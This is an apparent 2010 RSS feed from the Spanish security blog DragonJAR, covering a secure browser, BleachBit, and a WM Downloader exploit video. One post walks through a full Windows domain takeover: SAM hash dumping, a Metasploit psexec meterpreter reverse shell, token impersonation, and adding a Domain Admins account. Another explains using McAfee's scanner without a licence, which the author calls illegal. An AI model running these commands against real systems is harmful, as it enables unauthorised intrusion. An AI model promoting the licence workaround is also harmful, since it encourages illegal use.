<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>La Comunidad DragonJAR &#187; Windows</title>
	<atom:link href="http://www.dragonjar.org/tag/windows/feed" rel="self" type="application/rss+xml" />
	<link>http://www.dragonjar.org</link>
	<description>Noticias de actualidad y seguridad informática, herramientas de seguridad, documentación y una excelente COMUNIDAD.</description>
	<lastBuildDate>Fri, 12 Mar 2010 20:56:35 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>&#8220;Crean&#8221; un navegador pensando en su seguridad</title>
		<link>http://www.dragonjar.org/el-navegador-mas-seguro.xhtml</link>
		<comments>http://www.dragonjar.org/el-navegador-mas-seguro.xhtml#comments</comments>
		<pubDate>Thu, 18 Feb 2010 18:13:56 +0000</pubDate>
		<dc:creator>DragoN</dc:creator>
				<category><![CDATA[Seguridad Web]]></category>
		<category><![CDATA[Chromium]]></category>
		<category><![CDATA[Google Chrome]]></category>
		<category><![CDATA[Internet]]></category>
		<category><![CDATA[Navegador]]></category>
		<category><![CDATA[Privacidad]]></category>
		<category><![CDATA[Seguro]]></category>
		<category><![CDATA[SSL]]></category>
		<category><![CDATA[Web Browser]]></category>
		<category><![CDATA[Windows]]></category>
		<category><![CDATA[WINE]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=3885</guid>
		<description><![CDATA[La empresa de seguridad Comodo, famosa por su Antivirus y Firewall, ha creado un navegador llamado Comodo Dragon,  pensando totalmente en la seguridad del usuario.

Comodo Dragon esta basado en el navegador Chromium (igual que Google Chrome), pero ademas de las características que ya incluye Chromiun el nuevo navegador seguro de Comodo incluye las siguientes:

Privacidad de [...]]]></description>
			<content:encoded><![CDATA[<p>La empresa de seguridad Comodo, famosa por su Antivirus y Firewall, ha creado un navegador llamado Comodo Dragon,  pensando totalmente en la seguridad del usuario.</p>
<p style="text-align: center;"><img class="alignnone" title="Navegador Seguro" src="http://img690.imageshack.us/img690/5836/comododragon.png" alt="comododragon Crean un navegador pensando en su seguridad" width="500" height="321" /></p>
<p>Comodo Dragon esta basado en el <a rel="nofollow" target="_blank" href="http://code.google.com/intl/es-ES/chromium/">navegador Chromium</a> (igual que Google Chrome), pero ademas de las características que ya incluye Chromiun el nuevo navegador seguro de Comodo incluye las siguientes:<span id="more-3885"></span></p>
<ul>
<li>Privacidad de Chromium Mejorada</li>
<li>Fácil  identificación del certificado SSL</li>
<li>Acceso a sitios web más rápido</li>
<li>Mayor estabilidad y menos consumo de memoria</li>
<li>Modo Incognito (también conocido como &#8220;modo porno&#8221;) detiene las Cookies, Mejora de privacidad</li>
<li>Si usas Cromium o Google Chrome es Muy fácil de cambiar de su navegador a Comodo Dragón</li>
</ul>
<p>De momento Comodo Dragon esta disponible para Windows XP/Vista/7/Server, pero funciona adecuadamente con Wine en Mac (aun no probado en GNU Linux).</p>
<h2 style="text-align: center;"><a rel="nofollow" target="_blank" href="http://www.comodo.com/home/internet-security/browser.php">Descargar Comodo Dragon, el navegador pensado en tu seguridad.</a></h2>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/descargar-gratis-internet-explorer-8-final.xhtml" title="Descargar Gratis Internet Explorer 8 Final">Descargar Gratis Internet Explorer 8 Final</a></li><li><a href="http://www.dragonjar.org/fallo-en-openssl-permite-obtener-clave-privada.xhtml" title="Fallo en OpenSSL permite obtener clave privada">Fallo en OpenSSL permite obtener clave privada</a></li><li><a href="http://www.dragonjar.org/descargar-instalar-google-chrome-os.xhtml" title="Descargar e Instalar Google Chrome OS">Descargar e Instalar Google Chrome OS</a></li><li><a href="http://www.dragonjar.org/google-chrome-para-gnu-linux-y-mac-os-x.xhtml" title="Google Chrome para GNU Linux y Mac OS X">Google Chrome para GNU Linux y Mac OS X</a></li><li><a href="http://www.dragonjar.org/forzando-conexiones-ssl-por-defecto.xhtml" title="Forzando Conexiones SSL por defecto">Forzando Conexiones SSL por defecto</a></li><li><a href="http://www.dragonjar.org/actualiza-tu-equipo-con-windows.xhtml" title="Actualiza tu equipo con Windows">Actualiza tu equipo con Windows</a></li><li><a href="http://www.dragonjar.org/sin-ssl-y-ahora-quien-podra-defendernos.xhtml" title="Sin SSL ¿Y Ahora Quien Podrá Defendernos?">Sin SSL ¿Y Ahora Quien Podrá Defendernos?</a></li><li><a href="http://www.dragonjar.org/linux-unified-kernel-soporte-para-gnu-linux-y-windows-desde-el-kernel.xhtml" title="Linux Unified Kernel &#8211; Soporte para GNU Linux y Windows desde el mismo Kernel">Linux Unified Kernel &#8211; Soporte para GNU Linux y Windows desde el mismo Kernel</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/el-navegador-mas-seguro.xhtml/feed</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
		<item>
		<title>¿Cómo tomar control de un Dominio en Windows?</title>
		<link>http://www.dragonjar.org/como-tomar-control-dominio-windows.xhtml</link>
		<comments>http://www.dragonjar.org/como-tomar-control-dominio-windows.xhtml#comments</comments>
		<pubDate>Wed, 17 Feb 2010 20:07:39 +0000</pubDate>
		<dc:creator>DragoN</dc:creator>
				<category><![CDATA[Documentacion]]></category>
		<category><![CDATA[Administrador]]></category>
		<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Contraseñas]]></category>
		<category><![CDATA[Dominios]]></category>
		<category><![CDATA[Metasploit]]></category>
		<category><![CDATA[meterpreter]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Windows]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=3886</guid>
		<description><![CDATA[Los &#8220;dominios&#8221; en windows, facilitan muchas de las tareas a la hora de administrar una red, ya que permite realizar     una agrupación lógica de servidores de red y otros ordenadores, para compartir  información común sobre cuentas  y seguridad, pero es una practica muy común (aunque poco recomendada) que los administradores de [...]]]></description>
			<content:encoded><![CDATA[<p>Los &#8220;dominios&#8221; en windows, facilitan muchas de las tareas a la hora de administrar una red, ya que permite realizar     una agrupación lógica de servidores de red y otros ordenadores, para compartir  información común sobre cuentas  y seguridad, pero es una practica muy común (aunque poco recomendada) que los administradores de estos dominios reutilicen la clave que usan para el usuario administrador de un equipo en los dominios de windows.</p>
<p style="text-align: center;"><img class="alignnone" title="hackear dominio en windows" src="http://img517.imageshack.us/img517/3070/dominio.jpg" alt="dominio ¿Cómo tomar control de un Dominio en Windows?" width="502" height="425" /></p>
<p>En el siguiente video vamos a ver como  tomar el control de un dominio en windows, cuando se presenta el caso de Reutilización de contraseñas comentado anteriormente:<span id="more-3886"></span></p>
<p>REQUISITOS</p>
<ul>
<li>Tener acceso a una maquina miembro del dominio (para sacar el hash del usuario)</li>
<li>Todos los usuarios &#8220;administrador&#8221; de las maquinas miembros del dominio tienen la misma clave</li>
<li>Conocer la ip desde la que se loguea el administrador del dominio (puedes conseguirla de muchas formas, una de ellas es la ing. social)</li>
<li>Una copia de <a rel="nofollow" target="_blank" href="../http://www.dragonjar.org/backtrack-4-final.xhtml">BackTrack 4</a></li>
</ul>
<p>Teniendo los requisitos listo, pasamos a realizar los pasos para tomar el control de un dominio en Windows:</p>
<p style="text-align: center;"><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="425" height="344" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" /><param name="allowScriptAccess" value="always" /><param name="src" value="http://www.youtube.com/v/fIQQD193Hvc&amp;color1=0xb1b1b1&amp;color2=0xcfcfcf&amp;hl=en_US&amp;feature=player_embedded&amp;fs=1" /><param name="allowfullscreen" value="true" /><embed type="application/x-shockwave-flash" width="425" height="344" src="http://www.youtube.com/v/fIQQD193Hvc&amp;color1=0xb1b1b1&amp;color2=0xcfcfcf&amp;hl=en_US&amp;feature=player_embedded&amp;fs=1" allowscriptaccess="always" allowfullscreen="true"></embed></object></p>
<p>Como vemos, fácilmente hemos agregado un usuario administrador a la lista de &#8220;administradores de dominio&#8221; simplemente siguiendo estos pasos:</p>
<ul>
<li><strong>mount /dev/sda1 /mnt/sda1</strong><br />
Montamos la particion de la maquina windows</li>
<li><strong>cd /mnt/sda1/WINDOWS/system32/config</strong><br />
accedemos a la carpeta dodne se encuentra el archivo SAM</li>
<li><strong>samdump2 system SAM</strong><br />
sacamos los hash de los usuarios en la maquina windows</li>
<li><strong>msfconsole</strong><br />
ejecutamos el metasploit por consola</li>
<li><strong>use windows/smb/psexec</strong><br />
utilizamos el psexec</li>
<li><strong>exploit -p windows/meterpreter/reverse_tcp -o</strong><br />
utilizamos la shell meterpreter</li>
<li><strong>LHOST=192.168.1.160,LPORT=6789,RHOST=192.168.1.23,SMBUser=Administrator,SMBPass=  123&#8230;:5654&#8230; -j</strong><br />
configuramos las opciones del exploit</li>
<li><strong>sessions -i 1</strong><br />
una vez aparezca exitoso el ataque lanzamos la sesión donde se encuentra</li>
<li><strong>use incognito</strong><br />
utilizamos el modulo incognito de meterpreter</li>
<li><strong>list_tokens -u</strong><br />
mostramos los tokens</li>
<li><strong>impersonate_token mydomain\\domainadmin</strong><br />
tomamos las credenciales del administrador de dominio</li>
<li><strong>execute -f cmd.exe -i -t</strong><br />
lanzamos la consola de windows</li>
<li><strong>net user hack MPass5678 /add /domain</strong><br />
Agregamos el usuario &#8220;hack&#8221; con clave &#8220;MPass46782&#8243; al dominio</li>
<li><strong>net group &#8220;Domain Admins&#8221; hack /add /domain</strong><br />
metemos el usuario hack al grupo de administradores de dominio</li>
<li>Ya hemos tomado el control del dominio de windows</li>
</ul>
<p>Este ataque es compatible con  WinXP/Vista/Win7/Windows Server2k3/Windows  Server 2k7 y muestra lo sensible que es reutilizar las contraseñas en nuestro sistema, sin importar que tan &#8220;complejas&#8221; sean.</p>
<p>PD. en <a rel="nofollow" target="_blank" href="http://securitytube.net/How-to-own-a-Windows-Domain-video.aspx">Securitytube.net existe un vídeo en el que realizan este mismo procedimiento</a> un poco mas &#8220;a mano&#8221; pero que puede servirnos también en nuestro proceso de aprendizaje.</p>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/bypass-con-metasploit-atacando-a-nuestro-objetivo-desde-una-maquina-ya-comprometida.xhtml" title="Bypass con Metasploit: atacando a nuestro objetivo desde una maquina ya comprometida">Bypass con Metasploit: atacando a nuestro objetivo desde una maquina ya comprometida</a></li><li><a href="http://www.dragonjar.org/katana-multiples-distribuciones-de-seguridad-en-tu-usb.xhtml" title="Katana &#8211; Múltiples Distribuciones de Seguridad en tu USB">Katana &#8211; Múltiples Distribuciones de Seguridad en tu USB</a></li><li><a href="http://www.dragonjar.org/como-realizar-un-borrado-seguro-usando-bleachbit.xhtml" title="Como realizar un borrado seguro usando BleachBit">Como realizar un borrado seguro usando BleachBit</a></li><li><a href="http://www.dragonjar.org/video-explotando-wm-downloader.xhtml" title="Video: Explotando WM Downloader ">Video: Explotando WM Downloader </a></li><li><a href="http://www.dragonjar.org/como-recuperar-clave-mysql.xhtml" title="Como Recuperar Clave MySQL">Como Recuperar Clave MySQL</a></li><li><a href="http://www.dragonjar.org/video-introduccion-al-metasploit-framework-2.xhtml" title="Vídeo: Introducción al Metasploit Framework">Vídeo: Introducción al Metasploit Framework</a></li><li><a href="http://www.dragonjar.org/metasploit-framework.xhtml" title="Metasploit Framework 3.3.2">Metasploit Framework 3.3.2</a></li><li><a href="http://www.dragonjar.org/desbloquea-jailbreak-firmware-3-1-2-iphone-y-ipod-touch.xhtml" title="Desbloquea (Jailbreak) o Actualiza el iPhone OS 3.1.2 para iPhone y iPod Touch">Desbloquea (Jailbreak) o Actualiza el iPhone OS 3.1.2 para iPhone y iPod Touch</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/como-tomar-control-dominio-windows.xhtml/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Antivirus Gratuito con Poco Consumo</title>
		<link>http://www.dragonjar.org/hackeando-antivirus.xhtml</link>
		<comments>http://www.dragonjar.org/hackeando-antivirus.xhtml#comments</comments>
		<pubDate>Thu, 11 Feb 2010 20:57:59 +0000</pubDate>
		<dc:creator>Eduardo.Restrepo</dc:creator>
				<category><![CDATA[Documentacion]]></category>
		<category><![CDATA[AntiVir]]></category>
		<category><![CDATA[antivirus gratis]]></category>
		<category><![CDATA[Gratis]]></category>
		<category><![CDATA[Virus]]></category>
		<category><![CDATA[Windows]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=3831</guid>
		<description><![CDATA[No recuerdo la ultima vez que use un antivirus para mi  estación de trabajo!, tal vez sea porque ya no uso Windows desde hace unos siete u ocho años, cuando decidí migrar a un sistema operativo mas limpio, sano, y altamente honesto con el usuario final, es decir, migre a GNU-Linux.
Sin embargo, con el [...]]]></description>
			<content:encoded><![CDATA[<p>No recuerdo la ultima vez que use un antivirus para mi  estación de trabajo!, tal vez sea porque ya no uso Windows desde hace unos siete u ocho años, cuando decidí migrar a un sistema operativo mas limpio, sano, y altamente honesto con el usuario final, es decir, migre a GNU-Linux.</p>
<p>Sin embargo, con el pasar del tiempo, hemos visto como los virus y antivirus han proliferado en la nube, volviéndose un negocio cada día mas importante!.</p>
<p>Durante mi trabajo en la empresa XYZ, fueron muchos los proveedores que nos llegaron con soluciones de antivirus, algunos de ellos con muy buen éxito en mis pruebas de virus, algunos otros exageradamente caros y malos!</p>
<p>Bueno, dejemos a un lado el parloteo, y vayamos al asunto, la idea de esta guía, es demostrar       como     algunas     empresas      de   software     disfrazan     las   famosas actualizaciones de firmas como si fuera un texto plano que se baja a una maquina, y donde figuran las firmas de virus conocidos!. En realidad se esta bajando todo un archivo ejecutable, es decir un binario, que en su interior contiene las dichosas firmas,   y   que   usa   un   frontend   o   interfaz gráfica   para   ser   mas   amistoso   con   el usuario final pero que en realidad no es necesaria y solo consume recursos innecesarios.<span id="more-3831"></span></p>
<p>En mi investigación, con la ayuda y experiencia del grupo de trabajo que tuve en la empresa XYZ, pudimos observar el simple funcionamiento de los archivos contenidos en este archivo de &#8220;actualización&#8221;, donde se incluye un completo escanner antivirus por consola, con el que podremos saltarnos las pesadas interfaces gráficas de los antivirus y eliminar todas las amenazas de nuestra maquina totalmente gratis.</p>
<p>Recordemos que este procedimiento no es legal, es decir que no debe realizarse a menos que se tenga un contrato de soporte técnico valido y licencias de antivirus validos con McAfee.</p>
<p>De aquí en adelante no me hago responsable si decide hacer un acto ilegal para limpiar     su equipo     de   virus,   pues   este   documento      pretende    ser   solamente académico, para que el usuario que desee aprender un poco mas del mundo de los antivirus y su funcionamiento.</p>
<p>El primer paso es <a rel="nofollow" target="_blank" href="http://www.mcafee.com/apps/downloads/security_updates/superdat.asp?region=mx&amp;segment=enterprise">ingresar a esta pagina</a>:</p>
<p style="text-align: center;"><img class="alignnone" title="Antivirus Gratis" src="http://farm5.static.flickr.com/4002/4352068152_a38136f73e_o.jpg" alt="4352068152 a38136f73e o Antivirus Gratuito con Poco Consumo" width="500" height="253" /></p>
<p>A  continuación  debes  descargar  el  sdat###.exe  los  #  son  números  que  varían según la versión del sdat.</p>
<p>Descargamos este archivo.</p>
<p style="text-align: center;"><img class="alignnone" title="Hackear Antivirus" src="http://farm5.static.flickr.com/4012/4351320203_cd49d436c6_o.jpg" alt="4351320203 cd49d436c6 o Antivirus Gratuito con Poco Consumo" width="500" height="224" /></p>
<p>Después  de  descargar  el  archivo,  lo  movemos  a  una  carpeta  ya  que  hay  que descomprimirlo y extrae varios archivos</p>
<p style="text-align: center;"><img class="alignnone" title="Anti Virus Gratuito" src="http://farm5.static.flickr.com/4022/4351320295_87b9b20125_o.jpg" alt="4351320295 87b9b20125 o Antivirus Gratuito con Poco Consumo" width="500" height="407" /></p>
<p>Muy bien llego la hora de descomprimirlo.</p>
<p style="text-align: center;"><img class="alignnone" title="Antivirus Gratuito Poco Consumo Recursos" src="http://farm5.static.flickr.com/4021/4352068454_426e3cb75a_o.jpg" alt="4352068454 426e3cb75a o Antivirus Gratuito con Poco Consumo" width="450" height="243" /></p>
<p>En  la  consola  (ventana  negra)  ir  hasta  donde  está  el  archivo  descargado (sdat####.exe) y ejecutar:</p>
<blockquote><p><code>sdat####.exe     /E</code></p></blockquote>
<p>Sin las comillas</p>
<p style="text-align: center;"><img src="http://farm3.static.flickr.com/2789/4351320617_0f17fd4266_o.jpg" alt="Anvitirus" title="Antivirus Gratuito con Poco Consumo" /></p>
<p>Obteniendo la siguiente lista de archivos</p>
<p style="text-align: center;"><img class="alignnone" title="Antivirus para Windows" src="http://farm5.static.flickr.com/4006/4351320837_ea6ab37fd3_o.jpg" alt="4351320837 ea6ab37fd3 o Antivirus Gratuito con Poco Consumo" width="500" height="518" /></p>
<p>Después de explorar un poco las opciones del archivo scan.exe, llego a la conclusión que solo es necesario ejecutarlo con los siguientes parámetros para hacer lo mismo que su contraparte con interface gráfica, pero sin los elevados consumos y sin &#8220;problemas&#8221; de licencia:</p>
<blockquote><p><code>scan.exe /ADL /ALL /ANALYZE /CLEAN /DELETE /PROGRAM /SUB /UNZIP /PANALYZE /WINMEM /RPTERR /RPTCOR /RPTALL /report=c:\scan.txt</code></p></blockquote>
<p>Esto ejecuta un escaneo de todo el equipo ELIMINANDO todas las infecciones generando un reporte en “c:\scan.txt”</p>
<p><strong>Conclusiones:</strong></p>
<p>Las   empresas   de   antivirus  deberían  mejorar   el   sistema   de  actualización  de   las firmas de antivirus.</p>
<p>Las empresas deberían verificar con pruebas de desempeño sus antivirus, y dejar de   tratar   el   tema   de   seguridad   y   rendimiento   en  términos  monetarios   y   mas   en términos de beneficios para la red.</p>
<p><strong>Creo firmemente que esta técnica puede ser usada con otro antivirus, ¿alguien mas se anima a probar?</strong></p>
<p>Este articulo fue escrito por <a href="http://www.dragonjar.org/author/eduardo.restrepo">Eduardo Restrepo</a> para La Comunidad DragonJAR, tú también puedes enviar tus artículos para publicarlos en la comunidad, como ya lo hicieron <a href="http://www.dragonjar.org/author/axiacamus">Axiacamus</a>, <a href="http://www.dragonjar.org/author/anaxmon">Anaxmon</a>, <a href="http://www.dragonjar.org/author/epsilon">Epsilon</a>, <a href="http://www.dragonjar.org/author/4v4t4r">4v4t4r</a>, <a href="http://www.dragonjar.org/author/c0rt3x">Cortex</a>, <a href="http://www.dragonjar.org/author/Cr0n0p10">Cronopio</a>, <a href="http://www.dragonjar.org/author/D7n0s4ur70">D7n0s4ur70</a>, <a href="http://www.dragonjar.org/author/LauJAR">Laura JAR</a> y <a href="http://www.dragonjar.org/author/SamuraiBlanco">SamuraiBlanco</a>; Solo tienes que enviar tu articulo a <strong>dragon(arroba)dragonjar.org</strong>.</p>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/avira-premium-security-suite-gratis.xhtml" title="Avira Premium Security Suite Gratis">Avira Premium Security Suite Gratis</a></li><li><a href="http://www.dragonjar.org/descargar-avira-antivir-premium-gratis.xhtml" title="Licencia para Avira AntiVir Premium en Español Gratis">Licencia para Avira AntiVir Premium en Español Gratis</a></li><li><a href="http://www.dragonjar.org/licencia-gratis-del-panda-internet-security.xhtml" title="Licencia Gratis del Panda Internet Security">Licencia Gratis del Panda Internet Security</a></li><li><a href="http://www.dragonjar.org/descargar-ashampoo-winoptimizer-gratis.xhtml" title="Descargar Ashampoo WinOptimizer Gratis">Descargar Ashampoo WinOptimizer Gratis</a></li><li><a href="http://www.dragonjar.org/descargar-ultima-version-del-nero-gratis.xhtml" title="Descargar Ultima Versión del Nero Gratis">Descargar Ultima Versión del Nero Gratis</a></li><li><a href="http://www.dragonjar.org/descargar-windows-7-release-candidate-1.xhtml" title="Descargar Windows 7 Release Candidate 1">Descargar Windows 7 Release Candidate 1</a></li><li><a href="http://www.dragonjar.org/descargar-gratis-internet-explorer-8-final.xhtml" title="Descargar Gratis Internet Explorer 8 Final">Descargar Gratis Internet Explorer 8 Final</a></li><li><a href="http://www.dragonjar.org/los-antivirus-gratuitos-reaccionan-mas-rapido.xhtml" title="Los Antivirus Gratuitos Reaccionan Mas Rápido">Los Antivirus Gratuitos Reaccionan Mas Rápido</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/hackeando-antivirus.xhtml/feed</wfw:commentRss>
		<slash:comments>12</slash:comments>
		</item>
		<item>
		<title>Como realizar un borrado seguro usando BleachBit</title>
		<link>http://www.dragonjar.org/como-realizar-un-borrado-seguro-usando-bleachbit.xhtml</link>
		<comments>http://www.dragonjar.org/como-realizar-un-borrado-seguro-usando-bleachbit.xhtml#comments</comments>
		<pubDate>Sun, 31 Jan 2010 21:04:36 +0000</pubDate>
		<dc:creator>Epsilon</dc:creator>
				<category><![CDATA[COMOs]]></category>
		<category><![CDATA[GNU/Linux]]></category>
		<category><![CDATA[Herramientas Seguridad]]></category>
		<category><![CDATA[Aplicacion]]></category>
		<category><![CDATA[aplicaciones]]></category>
		<category><![CDATA[Archivos]]></category>
		<category><![CDATA[bleachbit]]></category>
		<category><![CDATA[borrar archivos]]></category>
		<category><![CDATA[como borrar archivos]]></category>
		<category><![CDATA[Eliminar]]></category>
		<category><![CDATA[en archivos]]></category>
		<category><![CDATA[Herra]]></category>
		<category><![CDATA[Herramienta]]></category>
		<category><![CDATA[Informacion]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Windows]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=3625</guid>
		<description><![CDATA[BleachBit es una herramienta multiplataforma (tanto Windows como GNU/Linux) que nos permite realizar un borrado seguro evitando dejar algunos rastros. Cabe resaltar que aunque existan este tipo de herramientas, siempre la informática forense estará un paso adelante descubriendo hasta los mas mínimos detalles  de aquellos rastros que son imposibles de borrar. Sin embargo, con este [...]]]></description>
			<content:encoded><![CDATA[<p>BleachBit es una herramienta multiplataforma (tanto Windows como GNU/Linux) que nos permite realizar un borrado seguro evitando dejar algunos rastros. Cabe resaltar que aunque existan este tipo de herramientas, siempre la informática forense estará un paso adelante descubriendo hasta los mas mínimos detalles  de aquellos rastros que son imposibles de borrar. Sin embargo, con este pequeño articulo pretendemos  explicar un poco mas a fondo esta herramienta, la cual es muy útil por que podemos borrar mucha información critica con solo un par de clicks.</p>
<p style="text-align: center;"><img class="alignnone" title="Borrado Seguro" src="http://img13.imageshack.us/img13/7571/borradof.jpg" alt="borradof Como realizar un borrado seguro usando BleachBit" width="190" height="246" /></p>
<p>La instalación es muy sencilla,  pueden <a rel="nofollow" target="_blank" href="http://bleachbit.sourceforge.net/download">descargar el paquete</a> para su sistema operativo (si es GNU/Linux pueden descargar el paquete según su distribución), o si lo prefieren aquellos usuarios de debian y derivados pueden descargar la herramienta desde los repositorios:<span id="more-3625"></span></p>
<blockquote><p><code>apt-get install bleachbit</code></p></blockquote>
<p>Ejecutamos nuestra aplicacion ubicada en aplicaciones-herramientas del sistema-bleachbit y veremos algo como esto:</p>
<p style="text-align: center;">
<p style="text-align: center;"><img class="aligncenter" title="bleachbit" src="http://img59.imageshack.us/img59/6267/bleachbit.jpg" alt="borrado seguro" width="544" height="590" /></p>
<p style="text-align: justify;">En esta pantalla pueden escoger los datos que desean eliminar,  hay datos de muchas aplicaciones como  amsn, apt, evolution entre otros,  después de haber seleccionado las opciones,  damos click en borrar y esperamos que la herramienta haga su trabajo. En el proceso pueden salir errores, generalmente son problemas de permisos para borrar archivos, para evitar esto pueden entrar a bleachbit con permisos de root.</p>
<p style="text-align: justify;">Por otra parte, bleachbit nos ofrece una exploración profunda, de esta forma la aplicacion escaneara todo el disco duro buscando archivos como:</p>
<ul>
<li>Thumbs.db</li>
<li>Copias de seguridad</li>
<li> archivos basura</li>
</ul>
<p style="text-align: justify;">Hay que tener en cuenta que todos los archivos que borremos podrán ser recuperados, para hacer &#8220;irrecuperables&#8221; estos archivos debemos activar la casilla de sobre escribir archivos para ocultar su contenido, ubicada en el  menú de preferencias:</p>
<p style="text-align: center;"><img class="aligncenter" title="bleachbit" src="http://img4.imageshack.us/img4/1096/bleachbitpreferencias.jpg" alt="borrado seguro" width="479" height="312" /></p>
<p style="text-align: justify;">Ahora si lo que deseamos es triturar o eliminar algunos archivos específicos podemos hacerlo con esta aplicacion, debemos ir a archivo y escoger la opción de triturar archivos,  posteriormente buscamos los archivos a eliminar y eso es todo.</p>
<p style="text-align: center;"><img class="aligncenter" title="borrado seguro" src="http://img687.imageshack.us/img687/5034/triturararchivos.jpg" alt="bleachbit triturar archivos" width="537" height="547" /></p>
<p style="text-align: justify;">Como pueden ver bleachbit es una herramienta  muy completa para borrar  no solamente la basura de tu sistema, sino también aquellos archivos que nadie puede ver.</p>
<p style="text-align: justify;"><strong>Mas Información:</strong><br />
<a rel="nofollow" target="_blank" href="http://bleachbit.sourceforge.net/">Pagina Oficial de BleachBit</a></p>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/manual-de-truecrypt.xhtml" title="Manual de TrueCrypt">Manual de TrueCrypt</a></li><li><a href="http://www.dragonjar.org/como-detectar-y-prevenir-escalada-de-privilegios-en-gnulinux.xhtml" title="Como detectar  y prevenir escalada de privilegios en GNU/Linux">Como detectar  y prevenir escalada de privilegios en GNU/Linux</a></li><li><a href="http://www.dragonjar.org/binging-footprinting-utilizando-bing.xhtml" title="Binging – Footprinting utilizando Bing">Binging – Footprinting utilizando Bing</a></li><li><a href="http://www.dragonjar.org/katana-multiples-distribuciones-de-seguridad-en-tu-usb.xhtml" title="Katana &#8211; Múltiples Distribuciones de Seguridad en tu USB">Katana &#8211; Múltiples Distribuciones de Seguridad en tu USB</a></li><li><a href="http://www.dragonjar.org/instalando-varios-sistemas-operativos-en-un-acer-one-parte-i.xhtml" title="Instalando Varios Sistemas Operativos en un Acer One &#8211; Parte I">Instalando Varios Sistemas Operativos en un Acer One &#8211; Parte I</a></li><li><a href="http://www.dragonjar.org/actualiza-tu-equipo-con-windows.xhtml" title="Actualiza tu equipo con Windows">Actualiza tu equipo con Windows</a></li><li><a href="http://www.dragonjar.org/como-saber-si-estas-infectado-con-el-conficker-2.xhtml" title="¿Como saber si tu equipo esta infectado con el Conficker?">¿Como saber si tu equipo esta infectado con el Conficker?</a></li><li><a href="http://www.dragonjar.org/como-tomar-control-dominio-windows.xhtml" title="¿Cómo tomar control de un Dominio en Windows?">¿Cómo tomar control de un Dominio en Windows?</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/como-realizar-un-borrado-seguro-usando-bleachbit.xhtml/feed</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
		<item>
		<title>Video: Explotando WM Downloader</title>
		<link>http://www.dragonjar.org/video-explotando-wm-downloader.xhtml</link>
		<comments>http://www.dragonjar.org/video-explotando-wm-downloader.xhtml#comments</comments>
		<pubDate>Fri, 29 Jan 2010 19:07:26 +0000</pubDate>
		<dc:creator>Epsilon</dc:creator>
				<category><![CDATA[Artículos sobre seguridad]]></category>
		<category><![CDATA[Herramientas Seguridad]]></category>
		<category><![CDATA[Descargar]]></category>
		<category><![CDATA[Download]]></category>
		<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Exploits]]></category>
		<category><![CDATA[MP3]]></category>
		<category><![CDATA[Podcast]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Video]]></category>
		<category><![CDATA[Vulnera]]></category>
		<category><![CDATA[Vulnerabilidad]]></category>
		<category><![CDATA[Windows]]></category>
		<category><![CDATA[WM Downloader]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=3762</guid>
		<description><![CDATA[WM Downloader es un reproductor de Windows y un MP3 Stream Rippe/grabber (No graba directamente los sonidos desde el programa), el cual hace mas fácil descargar streaming de Windows y SHOUTcast Streams.  Con este programa puedes descargar de manera muy sencilla todos tus podcast o videopodcast favoritos.

Sin embargo WM Downloader en su versión  3.0.0.9 [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">WM Downloader es un reproductor de Windows y un MP3 Stream Rippe/grabber (No graba directamente los sonidos desde el programa), el cual hace mas fácil descargar streaming de Windows y SHOUTcast Streams.  Con este programa puedes descargar de manera muy sencilla todos tus podcast o videopodcast favoritos.</p>
<p style="text-align: center;"><img class="alignnone" src="http://www.mini-stream.net/res/images/wmdownloader/screenshot.gif" alt="WM Downloader Exploit" title="Video: Explotando WM Downloader " /></p>
<p style="text-align: justify;">Sin embargo WM Downloader en su versión  3.0.0.9 presenta algunos fallos de seguridad considerables, así lo demuestra DouBle Zer0 Zer0, en un vídeo donde nos  muestra como se puede explotar una vulnerabilidad de tipo &#8220;stack overflow&#8221; creando archivos m3u corruptos. A continuación el vídeo,  y el exploit lo pueden visualizar <a rel="nofollow" target="_blank" href="http://www.milw0rm.com/exploits/8403">desde acá</a>.<span id="more-3762"></span></p>
